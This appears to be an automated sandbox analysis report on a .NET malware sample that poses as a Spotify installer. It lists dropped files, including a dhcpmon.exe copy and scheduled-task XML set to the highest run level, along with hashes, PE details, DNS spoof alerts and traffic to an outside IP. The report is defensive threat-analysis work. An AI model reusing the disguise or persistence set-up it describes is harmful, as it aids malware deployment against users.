SHA-512:	A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	847
Entropy (8bit):	5.35816127824051
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
MD5:	31E089E21A2AEB18A2A23D3E61EB2167
SHA1:	E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
SHA-256:	2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
SHA-512:	A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe Download File
Process:	C:\Users\user\Desktop\LFEs2N6DU4.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.713207310454996
Encrypted:	false
SSDEEP:	192:RylWethV1SLBdCYpy/zFkKt7QqMT0U2/JT0JN7Kae6b4vT:RYWetP1SLuhk6snT0UUKN7Kj
MD5:	5B3262B61A5EAA3EBE7E8BDC4958FC3F
SHA1:	112314D871226E07180BF2D0A2852120CBC1399F
SHA-256:	799A0831A87F80DDCED683CF26C082C58C936A1BB868DD0E97552A9F035BA4EE
SHA-512:	319AA0970867EC79FB9C6B5F90D8D276EAB4E59A7DFD6DEAB30C15F90651B80EA409C57F0FDC8E0E23EEAC0621AF0312CB0A4206F80E2F5E22D63B48AB7DDC57
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(.................0..............5... ...@....@.. ....................................@..................................4..O....@..d....................`.......4............................................... ............... ..H............text... .... ...................... ..`.rsrc...d....@......................@..@.reloc.......`......................@..B.................4......H.......@#...............3...............................................r...p(......-.(....(....r...p(........0..W.......s......o....+..o.......(....(......(.....o.......(....#......3@2..o.... ....(......&.........G..S.......0..M.......(....(....o.......+2.....o ...,"..(!...,..o"...r...p(#...,..(....&..X....i2.....0..4.......ri..p($...r...p ............%.(....(.....o%...t.....0.."........r...p .......o%....&......&......................Bs&...r...p('.......0..........

C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\LFEs2N6DU4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\dhcpmon.exe Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.713207310454996
Encrypted:	false
SSDEEP:	192:RylWethV1SLBdCYpy/zFkKt7QqMT0U2/JT0JN7Kae6b4vT:RYWetP1SLuhk6snT0UUKN7Kj
MD5:	5B3262B61A5EAA3EBE7E8BDC4958FC3F
SHA1:	112314D871226E07180BF2D0A2852120CBC1399F
SHA-256:	799A0831A87F80DDCED683CF26C082C58C936A1BB868DD0E97552A9F035BA4EE
SHA-512:	319AA0970867EC79FB9C6B5F90D8D276EAB4E59A7DFD6DEAB30C15F90651B80EA409C57F0FDC8E0E23EEAC0621AF0312CB0A4206F80E2F5E22D63B48AB7DDC57
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(.................0..............5... ...@....@.. ....................................@..................................4..O....@..d....................`.......4............................................... ............... ..H............text... .... ...................... ..`.rsrc...d....@......................@..@.reloc.......`......................@..B.................4......H.......@#...............3...............................................r...p(......-.(....(....r...p(........0..W.......s......o....+..o.......(....(......(.....o.......(....#......3@2..o.... ....(......&.........G..S.......0..M.......(....(....o.......+2.....o ...,"..(!...,..o"...r...p(#...,..(....&..X....i2.....0..4.......ri..p($...r...p ............%.(....(.....o%...t.....0.."........r...p .......o%....&......&......................Bs&...r...p('.......0..........

C:\Users\user\AppData\Local\Temp\dhcpmon.exe:Zone.Identifier Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\tmpA85B.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1315
Entropy (8bit):	5.120413096534581
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0lR8xtn:cbk4oL600QydbQxIYODOLedq3qR8j
MD5:	0C10D650882D4A09257AF2C0D57880DE
SHA1:	440A4AFE21E983131E157010784C9F4ABABCDBED
SHA-256:	52537FE98CA5F2009CF8F41EB7AAD8E12913EB6C50CE21B5888BB2F0AB1BCD58
SHA-512:	EBCACB7799826E7610E897AB9DB119DDD751C5DE30A6C32A3E2814C03479644F3CF86274AD52BD349BC8526B05F26F8185F31BAD4DBB853AE9AB2902D622DA5F
Malicious:	true
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmpAD7D.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1310
Entropy (8bit):	5.109425792877704
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
MD5:	5C2F41CFC6F988C859DA7D727AC2B62A
SHA1:	68999C85FC7E37BAB9216E0099836D40D4545C1C
SHA-256:	98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
SHA-512:	B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:4ot:Z
MD5:	899164DAF8349F673139B6C19C768F8C
SHA1:	BF14995E98D1EDCA60FADB7464DBE3B96F236A03
SHA-256:	562708312FBE0DC6E4D85E89DB03152C0C6F18EA4E37F89476986632F58E0C58
SHA-512:	600831A14C5647E15FFD62E09323CD23243A7389F46372C1F5DF991CCE4379B086F335D165E969240BFC1FCFEE30B24FD913F0E92B4D75596DC6E43A382C9921
Malicious:	true
Reputation:	unknown
Preview:	...p..H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.611416824235501
Encrypted:	false
SSDEEP:	3:oN0nacwRE2J5xAIYt4A:oNcNwi23fpA
MD5:	2C569CD29074C38A4C89BFE53A83613A
SHA1:	032F40E0C7AEC8234604CCEF6FCF695E45D315F0
SHA-256:	B211D73206C466856EB91A61CE6DEFD0DEBF44C58F2066F3B6270F3315D61057
SHA-512:	F9DF17047992E5D6A9459D6E002D98F8C10278102DF0FE32E4456E2660546BCA1370A230643C9732E7CB9AF2CCAC2DE95584D8F0BD123B669D13388E84BD98BB
Malicious:	false
Reputation:	unknown
Preview:	C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.713207310454996
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	LFEs2N6DU4.exe
File size:	12288
MD5:	5b3262b61a5eaa3ebe7e8bdc4958fc3f
SHA1:	112314d871226e07180bf2d0a2852120cbc1399f
SHA256:	799a0831a87f80ddced683cf26c082c58c936a1bb868dd0e97552a9f035ba4ee
SHA512:	319aa0970867ec79fb9c6b5f90d8d276eab4e59a7dfd6deab30c15f90651b80ea409c57f0fdc8e0e23eeac0621af0312cb0a4206f80e2f5e22d63b48ab7ddc57
SSDEEP:	192:RylWethV1SLBdCYpy/zFkKt7QqMT0U2/JT0JN7Kae6b4vT:RYWetP1SLuhk6snT0UUKN7Kj
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(.................0..............5... ...@....@.. ....................................@................................

File Icon


Icon Hash:	8e65656565a5a580

Static PE Info

General
Entrypoint:	0x40351a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xE6EFFE28 [Fri Oct 10 14:37:28 2092 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x34c8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x1464	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x34ac	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1520	0x1600	False	0.545276988636	data	5.38661650822	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x1464	0x1600	False	0.485440340909	data	5.87422786796	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x4100	0xd90	data
RT_GROUP_ICON	0x4ea0	0x14	data
RT_VERSION	0x4ec4	0x39e	data
RT_MANIFEST	0x5274	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright (c) 2021, Spotify Ltd
Assembly Version	1.1.68.632
InternalName	ConsoleApp5NW.exe
FileVersion	1.1.68.632
CompanyName	Spotify Ltd
LegalTrademarks
Comments	SpotifyInstaller
ProductName	Spotify
ProductVersion	1.1.68.632
FileDescription	SpotifyInstaller
OriginalFilename	ConsoleApp5NW.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/13/21-21:02:34.210507	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56590	8.8.8.8	192.168.2.7
10/13/21-21:02:40.001530	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60501	8.8.8.8	192.168.2.7
10/13/21-21:02:45.903541	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	53775	8.8.8.8	192.168.2.7
10/13/21-21:02:51.066340	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	63668	8.8.8.8	192.168.2.7
10/13/21-21:03:01.665621	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	58717	8.8.8.8	192.168.2.7
10/13/21-21:03:34.130301	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56680	8.8.8.8	192.168.2.7
10/13/21-21:03:44.820855	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60983	8.8.8.8	192.168.2.7
10/13/21-21:04:01.242821	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56064	8.8.8.8	192.168.2.7
10/13/21-21:04:21.984507	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	59571	8.8.8.8	192.168.2.7

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 21:02:24.657881021 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:24.657932997 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:24.658039093 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:24.689141989 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:24.689177036 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:24.826816082 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:24.826991081 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:24.832894087 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:24.832907915 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:24.833211899 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:24.876107931 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.270358086 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.311141968 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.329694986 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.329758883 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.329854012 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.329864025 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.329888105 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.329906940 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.329929113 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.355918884 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.355988026 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.356017113 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.356040001 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.356138945 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.356142998 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.356162071 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.356173038 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.356275082 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.356288910 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.380943060 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.380958080 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.381016016 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.381119013 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.381119967 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.381131887 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.381160975 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.381191015 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.381238937 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.381253958 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.381302118 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.381359100 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.381583929 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.381593943 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.381637096 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.381673098 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.381681919 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.381726027 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.381962061 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.382011890 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.382024050 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.382049084 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.382061005 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.382111073 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.409518003 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.409564972 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.409666061 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.409691095 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.409714937 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.409738064 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.409785986 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.409790993 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.409955978 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.409977913 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.410020113 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.410034895 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.410034895 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.410064936 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.410111904 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.410418034 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.410464048 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.410481930 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.410523891 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.410537958 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.410552025 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.410685062 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.410726070 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.410732031 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.410751104 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.410775900 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.410784006 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.410851002 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.411103010 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.411181927 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.411200047 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.411214113 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.411282063 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.436821938 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.436862946 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.436955929 CEST	443	49743	31.14.69.10	192.168.2.7
